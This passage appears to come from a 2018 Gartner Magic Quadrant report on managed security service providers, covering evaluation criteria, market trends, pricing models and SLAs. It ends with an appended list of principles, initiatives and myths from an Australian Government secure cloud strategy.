Product/Service refers to the service capabilities in areas such as information and log management; security event management; threat detection, monitoring and alerting; incident management and response; workflow; reporting; and service levels.

Overall Viability (Business Unit, Financial, Strategy, Organization) includes an assessment of the organization’s overall financial health, as well as the financial and practical success of the business unit. It also includes the likelihood of the organization continuing to offer and invest in the service, as well as the service’s position in the current portfolio.

Sales Execution/Pricing evaluates the service provider’s success in the MSSP market and its capabilities in presales activities. This also includes MSS revenue, pricing and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.

Market Responsiveness/Record evaluates the match of the MSS offering to the functional requirements stated by buyers at time of acquisition. It also evaluates the MSSP’s track record in delivering new functions when the market needs them.

Marketing Execution is an evaluation of the service provider’s ability to effectively communicate the value and competitive differentiation of its MSS offering to its target buyer.

Customer Experience evaluates the service delivery to customers. The evaluation includes ease of deployment, the quality and effectiveness of monitoring and alerting, and reporting and problem resolution. This criterion is assessed by surveys of vendor-provided reference customers, Gartner’s Peer Insights solution, and feedback from Gartner clients that are using an MSSP’s services or have completed competitive evaluations of the MSSP’s offerings.

Operations covers the MSSP’s service delivery resources, such as infrastructure, staffing and operations reviews, or certifications.

Table 1.   Ability to Execute Evaluation Criteria

  Evaluation Criteria             Weighting
  Product or Service              High
  Overall Viability               Medium
  Sales Execution/Pricing         Medium
  Market Responsiveness/Record    High
  Marketing Execution             Medium
  Customer Experience             High
  Operations                      Medium

Source: Gartner (February 2018)

Completeness of Vision

Market Understanding involves the MSSP’s ability to understand buyers’ needs and to translate them into services. MSSPs that show the highest degree of market understanding are adapting to customer requirements for specific functional areas and service delivery options. MSSPs with market-leading vision are investing in expertise and technology to monitor and analyze the external threat environment to better understand the sources, motives, targets and methods of attackers.

They are using that insight to improve the effectiveness of their MSS. They are also developing and introducing services that support large-scale data collection; advanced analytics, including statistical and behavioral functions; and monitoring of new data sources, such as endpoint, network and user data, to include in analysis. The goal of these capabilities is to more effectively find and respond to attacks, both broad-based and advanced targeted attacks.

Marketing Strategy evaluates clear, differentiated messaging consistently communicated internally, and externalized through social media, advertising, customer programs and positioning statements, and is tailored to the specific client drivers and market conditions in the MSS market.

Sales Strategy evaluates the strategy for selling that uses the appropriate networks, including direct and indirect sales, marketing, service, and communication, as well as partners that extend the scope and depth of market reach, expertise, technologies, services and their customer base.

Offering (Product) Strategy evaluates the provider’s approach to product development and delivery that emphasizes functionality and delivery options as they map to current and emerging requirements for MSSs. Development plans are also evaluated.

Vertical/Industry Strategy evaluates the strategy to direct resources (sales, product and development), skills and products to meet the specific needs of individual market segments, including verticals.

Innovation refers to the service provider’s strategy and ability to develop new MSS capabilities and delivery models to uniquely meet critical customer requirements. Examples include the capabilities described in Market Understanding.

Geographic Strategy addresses the vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries, as appropriate for that geography and market.

Table 2.   Completeness of Vision Evaluation Criteria

  Evaluation Criteria             Weighting
  Market Understanding            High
  Marketing Strategy              Medium
  Sales Strategy                  Medium
  Offering (Product) Strategy     High
  Business Model                  Not Rated
  Vertical/Industry Strategy      Medium
  Innovation                      High
  Geographic Strategy             Medium

Source: Gartner (February 2018)

Quadrant Descriptions

Leaders

Each of the service providers in the Leaders quadrant has significant mind share among organizations looking to buy MSSs as a discrete offering. These providers typically receive positive reports on service and performance from Gartner clients. MSSPs in the Leaders quadrant are typically appropriate options for enterprises requiring comprehensive portal-based access for interfacing with the service (e.g., responding to alerts, incident management, workflow, reporting, asset and access management, and managing other procured services, like vulnerability management) along with interaction with the MSSP for analyst expertise and advice.

Challengers

In the Challengers quadrant, Gartner customers are more likely to encounter MSSs that are offered as components of an IT or network service provider’s (NSP’s) other telecommunications, outsourcing or consulting services. Although an MSS is not a leading service offering for this type of vendor, MSSs in these markets tend to have a strong Ability to Execute and offer buyers capabilities when procuring services from a single provider aligns with the organization’s IT strategy.

Visionaries

Companies in the Visionaries quadrant have demonstrated the ability to turn a strong focus on managed security into high-quality service offerings for the MSS market. These service providers are often strong contenders for enterprises that require access to and support for “cutting edge” technology, flexible service delivery options and strong customer service. MSSPs in the Visionaries quadrant have less market coverage and fewer resources or service options compared with vendors in the Leaders quadrant.

Niche Players

Niche Players are characterized by service offerings that are available primarily in specific market segments, or primarily as part of other service offerings. These service providers often tailor MSS offerings to specific requirements of the markets they serve. This quadrant is also characterized by providers that are newer, or have expanded beyond local and regional markets, to the global MSS market, and are maturing their delivery capabilities and offerings.

Context

Prospective MSS buyers with threat management use cases should highly weight MSSPs’ threat research, security intelligence and threat detection capabilities.

Prospective MSS users should require a proof of concept (POC), or a demonstration of MSS offerings, to validate ease of use, effectiveness and value. Current MSS customers should leverage POCs for new offerings from their existing MSSP before purchasing.

Current and prospective MSS users should validate MSSPs’ services to address advanced attacks via network behavior, network forensics, payload analysis, endpoint behavior and endpoint forensics, or consider MDR providers that specialize in such attack detection capabilities.

Global coverage matters to global enterprises. The MSS market includes a wide range of providers available only in a single region or country. If your organization is not global and wants good local support and presence, then carefully evaluate a global MSSP’s ability to “look local.”

Market Overview

The MSS market is a mature one, offering buyers a variety of options from a diverse set of providers that generally align to a core focus. MSS is provided by pure-play security providers, IT system integrators and outsourcers, and network services providers. Buyers leverage MSSPs to address requirements that include 24/7 monitoring and threat detection, security technology management, and meeting a variety of compliance requirements. The preferred approach is to leverage a shared-service model where resources and support are remotely delivered by the provider. These may be complemented by related drivers, such as access to deeper or broader security expertise than is available in-house given the industry concern about the lack of available security resources and expertise, and the ability to retain those resources, or the need to redirect existing internal resources to other higher-value security functions inside the organization. Gartner clients interested in MSSs are increasingly looking for providers with effective threat detection capabilities that can detect both broad-based as well as advanced threats, and offer incident response services that may extend all the way through to the containment and remediation of a threat, either remotely or through physical on-site support.

This Magic Quadrant reflects the requirements of customers with service needs in multiple geographic regions. MSSPs included in the evaluation meet the minimum thresholds for MSS delivery in two or more regions via in-region SOCs. MSSPs with a multiregional presence typically have a sufficient understanding of region-specific customer requirements, as well as sufficient service delivery capabilities that can scale to support global service delivery. Customers with a mix of global delivery requirements and local regulatory requirements related to, for example, data privacy, may require customized services.

MSSPs that do not meet the criteria for inclusion in this Magic Quadrant may still deliver high-quality services within a continental or geographic region or regions. When considering MSSs, Gartner customers should develop evaluation criteria that meet their specific requirements, and take geography (language, local resources, etc.) into account, where applicable.

Market trends, which are discussed in more detail below, include:

  • Moving beyond monitoring of only network-based security technologies, particularly the network perimeter, with increasing focus on the endpoint (e.g., managed EDR services)
  • Increasing movement toward more customized outcomes for buyers
  • Buyer demand for capabilities to monitor popular SaaS applications, public cloud service providers and IaaS

The MSS market is growing at a healthy double-digit rate — in 2016, the market grew 10% to reach $9.4 billion in revenue (see “Market Share Analysis: Managed Security Services, Worldwide, 2016” ), and Gartner expects this growth rate to be in the 15% to 17% range for 2017. The MSS market constitutes approximately 60% of the overall security outsourcing market that will generate $18.7 billion revenue in 2017, growing at a CAGR of 11% through 2021. It is important to view MSS in the context of broader security outsourcing, because large enterprises are increasingly looking for hybrid engagements that include a mix of shared and dedicated service delivery components.

Demand for MSSs, from enterprises and midsize organizations, is driven primarily by a variety of factors:

  • Security staffing challenges and budget shortages: Gartner sees organizations of all sizes and geographies continuing to be challenged to attract and afford the appropriate security and risk management staff (see “Adapt Your Traditional Staffing Practices for Cybersecurity” ). Also, in an increasingly hostile external threat environment (see “How to Respond to the 2018 Threat Landscape” ), Gartner security and risk management leaders continue to report a lack of sufficient funding and increasing budget pressures that affect their security monitoring and operations capabilities.
  • Midsize enterprise adoption of detection and response capabilities: Midsize organizations are embracing detection and response capabilities to complement their investments in preventive security controls. These organizations are also impacted by the increasing scarcity (or affordability) of security operations talent. These organizations are looking for MSSPs to act as extensions of their security staff, instead of adding security head count. MSSPs can provide these services on a 24/7 basis, allowing customers to devote their often scarce internal security resources to higher-value activities.
  • Customized requirements: The MSS market is increasingly segmented between providers that focus on a shared-service approach, where offerings are applied homogeneously across customers with minimal, if any, room for customization, and providers that offer customized solutions. The shared-service approach is generally the purview of the pure-play MSSPs. The IT outsourcers (ITOs) and NSPs that have MSS offerings are increasingly focused on providing customized solutions to larger enterprises in order to meet very specific requirements. These typically revolve around support for a wide range of security technologies, especially more “lean forward” technologies that the organization has already deployed, or plans to deploy, but lacks the expertise and skills to run and use. The increasing demand for SOC build-outs in specific regions (e.g., Middle East and India) is also fueling the demand for customized services where MSS capabilities may be leveraged, such as providing remote, out-of-business-hours support to complement the on-site staff of the provider-run, customer-specific SOC.
  • First-time/early-cycle MSS customers: The MSS market is still attracting buyers. In both mature and emerging regions, there are organizations that are in their first cycle of building out threat detection and response capabilities. MSS forms a critical part of this because these organizations typically have low organizational competency in security and operate using lean security teams, and are therefore looking for opportunities to outsource security event monitoring, alerting and response. These “first cycle” MSS adopters are driving significant growth for the market.
  • Evolving compliance reporting requirements: Requirements such as GDPR (see “GDPR Clarity: 19 Frequently Asked Questions Answered” ) as well as corporate governance policies, are directly driving stronger requirements for threat monitoring, identification and incident response capabilities. As formal compliance regimes become more stringent or more pervasive, organizations are turning to external service providers to address the need to meet compliance requirements.
  • Expansion of security event monitoring into new domains: As organizations adopt cloud services (e.g., SaaS and IaaS predominantly), concerns about the lack of visibility into these environments from a security and risk management perspective are increasing. Customers considering MSS for security services are asking about MSSP capabilities for monitoring these environments.

Some MSS customers and buyers continue to express dissatisfaction with MSS providers, although they represent a minority. Common reasons for customers switching MSSPs or opting for another delivery model include a lack of perceived value versus the cost of MSSs, providers that fail to detect threats or generate a high level of false positives, and poor quality of service delivery and support during critical incidents. In particular, security and risk management leaders increasingly expect their MSSP to act as an extension of their security capabilities or teams, providing incident investigation and response support. These organizations are not resourced to consume only Tier 1 security operations capabilities, where they receive notifications of an incident and are expected to perform their own incident triage and investigation. That model may be appropriate for large enterprises with adequately resourced security teams that want to, and can, retain responsibility for incident triage, investigation and response.

Alternatives to using an MSSP include:

  • Managed detection and response services: Organizations have been increasingly looking for threat-detection-oriented service providers that offer more turnkey monitoring services coupled with higher-touch services. MDR service providers (see “Market Guide for Managed Detection and Response Services” ) are gaining increasing attention with buyers, particularly in the midsize and smaller enterprises. However, adoption by larger enterprises to augment existing capabilities, especially for advanced threat detection, is also occurring. Many MSSPs have introduced MDR-like services that are turnkey offerings using dedicated technology providers as premium services, but these are primarily focused on advanced threat detection use cases, usually via managed EDR or threat hunting. The use of network technologies for MDR-type services is starting to emerge. Gartner anticipates this trend to continue as MSSPs race to compete with the MDR providers.
  • Remote co-management of a customer’s SIEM solution: Increasingly, buyers across midsize and larger enterprises are purchasing SIEM solutions but looking for specific service providers to assist. Services available to the buyer range from engineering, tuning and performance monitoring of the customer’s SIEM tool, whether it is on-premises, hosted by a provider or a SaaS SIEM (see “Selecting and Deploying SaaS SIEM for Security Monitoring” ), all the way to complete management and 24/7 monitoring and alerting (in effect being an MSS to the customer, just using the customer’s technology). Buyers purchase their own SIEM tools for a variety of reasons (see “How and When to Use Co-managed Security Information and Event Management” ). In response to this trend, MSSPs are increasingly adding co-managed SIEM support for two to three SIEM solutions.
  • Organizations building their own, dedicated SOCs: Organizations decide to build and operate their own SOCs because they:
    • Desire more control over their detection and response technologies (either driven internally or due to regulatory requirements)
    • Require better access to their own data (for threat investigations or compliance purposes)
    • Have unique or specialized use cases or environments where more customized correlation/analytics is required (e.g., OT security monitoring requirements).
    • May be unaware of the concept of shared MSS, particularly because providers do not offer it to them. This is particularly true in emerging markets.
    To adapt to these requirements, MSSPs are adding or expanding customized services to customers for SOC build-outs (see “How to Plan, Design, Operate and Evolve a SOC” ).

Challenges to using an MSSP include:

  • Ability to deliver “integrated” incident response: MSS buyers should be aware when considering these services as most MSSPs still have limitations and barriers between the basic triage and customer notification of a potential incident, and specific incident response activities, such as collecting suspect binaries and performing analysis, which is then used to ascertain the type of threat, sophistication, attribution and scope of distribution inside an organization. Many MSSPs have incident response retainers that are required to be purchased by a customer in order to have access to these types of technical incident response functions and experts.
  • Data residency and other privacy requirements: Regulatory requirements regarding movement of and access to specific types of data may limit the scope of monitoring enterprises entrusted to MSSPs. For example, GDPR may drive more stringent requirements for MSSPs depending on the geography in which the MSS buyer operates.
  • Change in strategy to reduce outsourcing: At the enterprise level or within the security organization, a change in strategy (sometimes driven by changes in leadership) regarding the use of external services can mean that MSSs are not considered effective options.
  • Lack of customization: By definition, MSSs are meant to be standardized in terms of device management, analytics/correlation rules, and reporting and notifications. Customers that want more customization of their security operations may find that some MSSPs may be less than ideal for them if they focus on delivering shared services with little to no customization.

MSSP Landscape

The basic makeup of the MSSP vendor space has not changed fundamentally, as the market is mature. There are three major types of MSSPs. Overlap between these types occurs in the market, but MSSPs tend to fall into one of the categories.

  • Pure plays: These are generally smaller, privately held MSSPs that are completely focused on security services. Most of these MSSPs tend to serve a local market or region, but not all regions around the world. New pure-play security service providers often focus on specific vertical markets (e.g., legal, healthcare providers, energy and utilities) or regulatory requirements, or advanced threat detection technologies (e.g., managed EDR services). Gartner expects existing MSSPs and other IT services firms to acquire pure-play service providers that offer threat-detection-oriented services and advanced threat detection capabilities, especially those in the MDR space.
  • NSPs: These are network bandwidth and connectivity providers that manage and monitor network security products. They often provide remote monitoring, premises-based technologies and cloud-based services through their internet connections. Buyers that consume managed telecommunications services tend to include MSS when available as firewalls and other network-based security technologies can be a core component of the outsourcing deals.
  • ITOs/system integrators/business process outsourcers: These are IT services providers that typically manage security devices as part of large outsourcing or system integrations initiatives, where it makes sense for buyers to consume MSS as part of broad infrastructure management and monitoring deals.

In addition to the above common types of MSSPs, security consulting providers and some product vendors are emerging entrants offering MSSs. Security consulting firms have realized that MSS and ongoing security operations contracts are a more profitable, predictable and faster-growing revenue stream than one-off consulting projects. Many of these consultancies are more active in dedicated SOC staffing services than in MSS, but this is still a category of providers to watch. Also worth noting is that many IT outsourcers with security consulting businesses are becoming more active as MSSPs, through either acquisitions or the organic build-out of capabilities.

Some product vendors such as Cisco, CrowdStrike, F-Secure, FireEye and Rapid7 (among others) also offer MSS and/or MDR services. The primary motivation for these technology vendors in entering this market has been to increase their recurring revenue by attaching more annuity-based services to one-time product sales. Also, for new product areas in security (like EDR), offering managed services allows customers to better utilize the underlying technology product (because it can be more complex and time-consuming than anticipated once fully deployed) and helps them overcome skills shortages associated with newer security technology areas. However, product vendors are still very much a niche play in the broader MSS market.

MSS Portfolio

The services that are core to MSS offerings involve vendor-agnostic monitoring and management of core security technologies, with a focus on:

  • Firewalls and next-generation firewalls (NGFs)
  • Network IDPSs and next-generation IDPS
  • Multifunction firewalls/UTMs
  • SWGs and URL filters
  • EPPs

MSSPs also tend to support a broad scope of security and non-security-type data sources for security event monitoring. The event sources may include network devices (e.g., VPN devices, routers and switches), logs from user directory services (e.g., Active Directory), and host OS logs and application-specific logs. In the past couple of years, MSSPs have introduced services to manage and monitor both proprietary and commercial technologies designed to detect and protect against advanced threats. These services analyze payloads to detect malicious software and monitor activity and behavior of network traffic (e.g., network traffic analysis [NTA] tools) and endpoints (e.g., EDR agents). In addition to monitoring, many MSSPs have management services for those technologies (usually under their “MDR services”).

MSSPs may also provide cloud or SaaS-based services, including:

  • Vulnerability scanning
  • Network-based firewall/IDP
  • Web filtering/SWG
  • CASB
  • Email security
  • DDoS mitigation

Among organizations that have deployed a SIEM solution, Gartner sees increasing interest in services to monitor or run the SIEM. MSSPs continue to add offerings to support customer-deployed SIEM to accommodate these customers, either in a more customized model or until the customer can be transitioned off their SIEM tool and onto the MSSP’s delivery platform.

Incident Response Services

Most MSSPs offer incident response capabilities to assist customers with investigation and remediation activities. Gartner clients, in light of significant breaches in the news over the last 12 months, are interested in adding retainers for digital forensics and incident response (DFIR) services, and MSS customers generally look to their provider for these services. These activities are available as proactive- and reactive-oriented services, delivered primarily remotely, but on-site as needed. They are typically available on a consulting basis, and can be purchased as needed or via a retainer for a set number of hours, with service-level commitments for response time for both remote and on-site support. Prospective customers should confirm with MSSP candidates how much response support is available within the standard monitoring services, and when engaging the incident response retainer is required (for example, does the customer have to authorize use of the hours, or is it preagreed how the MSSP can use those hours?). Customers should also confirm the SLAs provided and the penalties if SLAs are missed. If the MSSP offers packaged or prepaid retainer hours for incident response activities, customers should confirm whether those hours are available for other security services (e.g., proactive services) if they are not needed for incident response.

Threat Intelligence Capabilities and Services

Requirements for how MSSs leverage threat intelligence, and what premium threat intelligence services are available, appear on Gartner clients’ RFPs with increasing frequency. Buyers are specifically interested in how MSSPs are leveraging threat intelligence (e.g., to improve the prioritization and context around detected incidents). Additionally, rather than procuring advanced or customer-specific threat intelligence services from a third party, MSS buyers are looking first at the subscription-based capabilities of the MSSP. Several MSSPs have dedicated security and threat-oriented research teams to improve their visibility of the threat landscape — that is, the identities, motives, targets, and tactics, techniques and procedures of external attackers. These teams feed the MSSP’s detection capabilities, but their output also tends to be resold as advanced threat intelligence offerings, such as customer-specific dark web monitoring services. MSSPs that do not have their own threat research groups often use a mix of one or more third-party threat intelligence providers along with open-source threat intelligence. MSSPs are increasing their support for common threat intelligence description and sharing formats, such as Structured Threat Information Expression (STIX) and Trusted Automated Exchange of Indicator Information (TAXII). In the last 12 months, a few MSSPs have also introduced threat intelligence platforms as part of their overall delivery platforms (see “Market Guide for Security Threat Intelligence Products and Services” ). As the use and maturity of these tools increase, Gartner expects to see improved capabilities for customers to securely share threat intelligence with, and have it consumed by, the MSS. Buyers with requirements for this level of sharing should confirm with prospective MSSPs whether they already have this capability and, if not, where it sits on their roadmap.

MSS Delivery

Managed Service Portal Functionality

Buyers should apply significant focus to methods of communication with their provider, as this enables measurable recognition of value received. A key way to orchestrate efficient two-way recorded dialogue between outsourced security professionals and internal teams is through a fully featured portal. Any portal should provide multirole and granular access control, and dashboards with information preconfigured and adaptable to fit many different roles and functions within your organization, including those within senior risk management. Fully interactive incident ticketing with features for handover and resolution tracking provide buyers with a method not only to improve the service that the provider is operating through enrichment and semantic learning, but also to track and manage ROI in an area visible to both parties. Important features of provider portals also include the ability to search through security data and carry out threat hunting through fast and intuitive interfaces as well as seamless cross-service and function integrations with other security services and information, such as vulnerability scanning outputs and threat intelligence indicators.

Buyers should consider the quality and functionality of the provider portal to be a high-priority element in their decision to procure any MSS, as this becomes the outlet and store for all content that the service produces and is measured by.

Security Operations Centers

All MSSPs leverage SOCs as the physical locations from which to deliver 24/7 services. MSSPs use different patterns for service delivery: usually either a single SOC operating round-the-clock, multiple SOCs using a follow-the-sun approach (each operating during local business hours seven days per week, and covering for one another for resiliency as needed), or a hybrid of these two models. Each has its strengths and weaknesses. For example, technically a SOC in one region can support a customer in another; however, there are potentially significant roadblocks in the form of language, time zones and regulations that need to be considered. On the other hand, better service may be achieved when the MSSP uses a follow-the-sun model, which can alleviate the SOC analyst quality issues that arise when analysts have to work nights and weekends (see “How to Plan, Design, Operate and Evolve a SOC”). MSS buyers need to carefully evaluate the SOC locations and operating models used by MSSPs to ensure they will meet their requirements.

Threat Detection and Advanced Analytics Capabilities

Many MSSPs claim capabilities to assist their customers in addressing advanced attacks, in addition to their abilities to detect common, broad-based threats. These capabilities may be visible as discrete service offerings or options, or as features embedded in existing offerings. They may include, for example:

  • Correlation of events with threat intelligence that can provide attribution (e.g., to a broad-based malware family versus known hacking group)
  • Analysis of activity patterns (across an MSS customer base as well as within the customer environment) to identify outliers, exceptions or deviations from baselines in security events, network traffic, or the activity of users or entities on the network
  • Analysis of user behavior to identify anomalies from normal behavior across environments (on-premises, cloud) — this is an emerging area that is currently supported by very few MSSPs

The adoption of big data technologies like Hadoop, Elasticsearch and NoSQL is permeating MSS. This makes sense as MSSPs have historically had to deal with “big data problems” — a large volume, velocity and variety of log event and other data. These technologies are being used to help MSSPs better manage and analyze the large amounts and various types of data acquired from their customers, and to make it more accessible (e.g., via real-time search as opposed to scheduled search jobs) and for longer periods of time than what has been previously available. However, the time horizon to search over those logs continues to stay relatively stable, with 90 days of online data being the norm and data older than that being relegated to warm or offline storage. The adoption of big data technologies is also fueling a drive to improve threat detection capabilities through advanced analytics; however, it’s still early days.

As big data technologies are being adopted, advanced analytics are being used in back-end systems to complement traditional real-time security event correlation and monitoring capabilities. Batch-oriented analytics that can be run over much larger datasets covering weeks or months of data, commonly using machine-learning-based approaches, are being employed. Gartner recommends that customers ask for specific information and evidence where advanced analytics is being used as a means of differentiating and comparing service offerings across providers. Most MSSPs claim that the customer won’t be able to determine, based on the alerts they are notified with, whether the event was detected using standard methods, such as correlation or threat intelligence matches, or if it was via a more advanced method (e.g., anomalous activity detected using a supervised machine learning approach). Buyers should also ask about how a provider leverages advanced analytics methods. For example, is the capability through a commercially available technology that is managed by the provider, or has the provider actually invested in R&D to customize and tune a commercial (or proprietary) analytics technology?

Monitoring Beyond On-Premises Customer Environments

SaaS visibility is top of mind with Gartner clients interested in MSS, with IaaS second. Use of popular SaaS such as Office 365, Salesforce, Box and Workday is driving the demand. MSSPs are slowly adding support, via partnerships, for CASBs to provide SaaS security monitoring, but few Gartner clients report interest in this approach. Most clients expect native API-based approaches to be used as part of the core security event monitoring capabilities. The approach is mixed across MSSPs: some claim support for APIs, others rely on the use of a CASB solution, and a few offer both, depending on the level of event monitoring required by the buyer.

Most MSSPs have focused on the monitoring of assets located in public cloud services, such as AWS and Azure, by leveraging a mix of external security controls deployed in the public cloud and native API-based security integrations (e.g., AWS CloudTrail). Support for Azure has increased over the past 12 months, but AWS is still the most supported environment. Few MSSPs have support for IaaS security products like cloud workload protection platforms (see “Market Guide for Cloud Workload Protection Platforms”).

There is another dimension to cloud security, and that is security services delivered from the cloud (e.g., security as a service). Some MSSPs support established security-as-a-service technologies (e.g., SWGs and secure email gateways [SEGs]). For example, many of the pure-play providers with their own technology portfolios, and NSPs through partnerships with cloud-based SWG providers, offer management and monitoring services for those deployment modes.

Pricing Models

There are several pricing models used by MSSPs, leading to confusion among buyers as to which approach is most appropriate and making it difficult to compare pricing across competing providers. A majority of MSSPs offer a pricing model based on the type and size of the security technology to be monitored and/or managed for customer-owned security technologies, devices and other log sources. Log collection is typically priced by the number and types of sources, or by the number of events per time period (device count pricing includes implicit expectations of event volumes). There is often a clear distinction between technology that is monitored in real time and subject to alerting SLAs, and technology that is not — that is, where logs are collected and subject to reporting or querying, but not to real-time correlation and analyst review.

Alternative models are also being seen in the market. Gartner expects to see new pricing models introduced as a competitive advantage, and to reduce the complexity and friction with selling MSSs:

  • Data volume or velocity: Providers, especially those using a commercial SIEM solution as part of their delivery platform, are pricing MSSs based on the average volume of data collected over a time period (such as gigabytes per day) or the velocity of data sent to the MSS for analysis (usually measured as log events sent per second or daily). This model allows customers to pay based on the actual amount of data provided to the service provider for analysis, rather than the number or type of data sources. This is not a dominant model in the market. Issues with this model include a lack of control over the amount of data being generated (e.g., during a DDoS attack) and that not all data provides equal benefits, but customers pay the same rate for data collected and analyzed (e.g., web proxy versus DNS events).
  • Per log event source pricing: This pricing model is based on the total number of sources sending data to the MSSP. In this model, all data sources, regardless of how much log and event data they generate, are treated equally. This is sometimes provided as an enterprisewide license model too.
  • Per incident: In this approach, customers are charged based on the number of incidents that are detected and number of alerts notified.
  • Per user or asset: This approach is based on the number of users or assets inside an organization, or on analytics activities (such as running specific algorithms against a volume of data).

Device management pricing is typically based on the number of configuration changes to be performed within a period of time. This model offers a fairly straightforward means for potential customers to determine the cost of a service and allows comparison across potential providers. A potential issue with this model is that, where customers have high-capacity event sources that are underutilized, they pay for the potential capacity, rather than actual usage of those devices.

Service-Level Agreements

Gartner clients need to be aware of the SLAs offered by MSSPs, as they are a continuing source of misunderstanding by buyers and differences exist across providers. SLAs are commonly offered for monitoring and managed services. Usually, a vendor segregates the SLAs into three to five response levels measured against a specific severity (e.g., urgent, high, medium, low). In many cases, the monitoring and response severities are aligned to managed device SLAs too.

MSS buyers need to confirm the tiers and associated SLAs for the services they plan to buy. Many MSSPs offer various tiers of service at different price points with varying SLAs (e.g., more expensive service will have shorter response times). MSS buyers should confirm the options available with the providers and evaluate which tier they are being quoted, and whether fewer tiers of service might be acceptable given the trade-offs between risks and costs. SLA rightsizing is a critical part of getting the most value from an MSSP. It is also important to confirm how the SLA is measured and calculated. For example, does the clock on an SLA start when the incident is detected by an automated system, when the incident is picked up from a queue of unassigned events by an analyst, or from the time an analyst has established that there is an incident worth notifying the customer about?

Most MSSPs offer standard SLAs; however, some negotiate SLAs on a customer-by-customer basis, while a few others still negotiate custom SLAs for each customer. MSS buyers consuming these services as part of broader IT outsourcing contracts need to be doubly cautious about defining the right SLAs. Gartner has observed several risk areas in such engagements — from providers carrying forward generic SLAs to weak service definitions to poor reimbursements and remediation. Finally, MSS buyers need to confirm whether a provider offers any reimbursements for missed SLAs. Some MSSPs offer credits against future payments for missed SLAs, but this is not common practice across the industry. These can scale to become more severe for multiple occasions of SLA noncompliance. However, there is usually a limit for how many credits can be provided, such as not exceeding a certain percentage of the total monthly or annual charges. Also, sometimes there are earn-back provisions that forgive remedies based on improved performance by the MSSP. It is important to note that, in most cases, it is the customer’s responsibility to notify the service provider of any proposed SLA violation within a set time period of the date on which the proposed violation occurred. At a minimum, the provider should have capabilities for performing a root cause analysis and offering root cause elimination as part of its SLA conformance.

MSSP Market Activity in 2017

The global MSSP market in 2017 was stable. CSC and HPE Enterprise Services formally merged as DXC Technology in April 2017.

MSSPs Not Evaluated in the Magic Quadrant

Not included in this Magic Quadrant analysis are smaller, region-, country-level and local-area MSS providers, which can include small pure plays and larger providers that do not have enough MSS business in multiple regions to meet the inclusion criteria (although they may be a good choice for buyers that don’t require a global footprint and would prefer a more “local” provider). Also excluded from this analysis are service providers that provide MSSs only for their own technologies, and that do not deliver services for third-party commercial technology (for example, MDR service providers). Providers with security services that are sold and delivered primarily with infrastructure outsourcing, staff augmentation or account-dedicated resources are also not included in this Magic Quadrant.

Evidence

  • Gartner customer inquiries and information sharing related to MSSPs
  • Analyst interactions with Gartner customers via inquiries and meetings
  • Survey of MSSPs
  • Survey of MSS reference customers
  • Gartner Peer Insights

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.

Australian Government – Digital Transformation Strategy

  • https://www.dta.gov.au/what-we-do/policies-and-programs/secure-cloud/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BWmMXjzgNTV2ysnBsB%2BS3DQ%3D%3D
  • https://www.dta.gov.au/files/cloud-strategy/secure-cloud-strategy.pdf
  • Principle 1: Make risk-based decisions when applying cloud security
  • Principle 2: Design services for the cloud
  • Principle 3: Use public cloud services as the default
  • Principle 4: Use as much of the cloud as possible
  • Principle 5: Avoid customisation and use services ‘as they come’
  • Principle 6: Take full advantage of cloud automation practices
  • Principle 7: Monitor the health and usage of cloud services in real time
  • Initiative 1: Agencies must develop their own cloud strategy
  • Initiative 2: Implement a layered certification model
  • Initiative 3: Redevelop the Cloud Services Panel to align with the procurement recommendations for a new procurement pathway that better supports cloud commodity purchases
  • Initiative 4: Create a dashboard to show service status for adoption, compliance status and services panel status and pricing
  • Initiative 5: Create and publish cloud service qualities baseline and assessment capability
  • Initiative 6: Build a cloud responsibility model supported by a cloud contracts capability
  • Initiative 7: Establish a whole-of-government cloud knowledge exchange
  • Initiative 8: Expand the Building Digital Capability program to include cloud skills
  • Myth 1: The Cloud is not as secure as on premise services
  • Myth 2: Privacy reasons mean government data cannot reside offshore.
